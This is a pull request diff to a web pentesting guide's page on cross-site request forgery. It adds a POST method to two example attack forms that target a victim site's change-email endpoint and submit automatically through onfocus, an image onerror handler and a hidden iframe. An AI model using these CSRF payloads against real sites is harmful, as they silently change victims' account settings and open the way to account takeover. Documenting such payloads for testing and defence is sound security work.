### PR TITLE
Add missing HTML form methods for POST exploits

### DIFF
--- a/pentesting-web/csrf-cross-site-request-forgery.md
+++ b/pentesting-web/csrf-cross-site-request-forgery.md
@@ -237,7 +237,7 @@ Other HTML5 tags that can be used to automatically send a GET request are:
 <html>
   <body>
   <script>history.pushState('', '', '/')</script>
-    <form action="https://victim.net/email/change-email" id="csrfform">
+    <form method="POST" action="https://victim.net/email/change-email" id="csrfform">
       <input type="hidden" name="email" value="some@email.com" autofocus onfocus="csrfform.submit();" /> <!-- Way 1 to autosubmit -->
       <input type="submit" value="Submit request" />
       <img src=x onerror="csrfform.submit();" /> <!-- Way 2 to autosubmit -->
@@ -258,7 +258,7 @@ The request is sent through the iframe withuot reloading the page
 <html>
   <body>
   <iframe style="display:none" name="csrfframe"></iframe> 
-    <form action="/change-email" id="csrfform" target="csrfframe">
+    <form method="POST" action="/change-email" id="csrfform" target="csrfframe">
       <input type="hidden" name="email" value="some@email.com" autofocus onfocus="csrfform.submit();" />
       <input type="submit" value="Submit request" />
     </form>


### PR DESCRIPTION
"Form POST request" and "Form POST request through iframe" now have the correct POST method.